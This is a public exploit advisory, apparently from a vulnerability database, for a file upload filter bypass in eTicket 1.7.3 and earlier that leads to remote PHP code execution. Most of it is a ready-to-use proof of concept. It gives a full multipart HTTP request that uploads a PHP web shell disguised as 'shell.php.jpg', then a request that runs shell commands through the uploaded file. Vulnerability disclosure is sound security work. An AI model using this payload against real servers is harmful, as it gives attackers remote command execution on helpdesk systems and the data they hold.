eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)

2015.12.22
Credit: Saeid Atabaki
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution) # Date: 17/11/2015 # Exploit Author: Saeid Atabaki # E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org # Advisory URL: https://www.nsecurity.org/advisories/ # Linkedin: https://www.linkedin.com/in/saeidatabaki # Vendor Homepage: http://www.eticketsupport.com # Version: <= 1.7.3 # Tested on: Apache 2.2 PHP 5.1, MySQL 5.4 Summary: eTicket is a PHP-based electronic support ticket system that can receive tickets via email (pop3/pipe) or a web form. It also offers a ticket manager with many features. An ideal, easy to use and install helpdesk solution for any website. 1. PoC request POST /eticket/open.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/eticket/ Cookie: Xplico=o0treq4pla0r3acd51d5131p76; PHPSESSID=0380uicd4n00ambkpfaucv6mm4 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1321807899848630298734395199 Content-Length: 1328 -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="name" Saeid -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="email" bytecod3r@gmail.com -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="email_confirm" bytecod3r@gmail.com -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="phone" -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="cat" 1 -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="subject" Test -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="message" test -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="pri" 1 -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="attachment"; filename="shell.php.jpg" Content-Type: image/jpeg <?php echo "\n\n"; passthru($_GET['cmd']); ?> -----------------------------1321807899848630298734395199 Content-Disposition: form-data; name="submit_x" Open Ticket -----------------------------1321807899848630298734395199-- 2. Click on the "View Open Tickets", from the control panel, get the file name. it should be something like xxx_shell.php.jpg 3. GET /eticket/attachments/590_shell.php.jpg?cmd=ls HTTP/1.1

References:

https://www.nsecurity.org/advisories/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top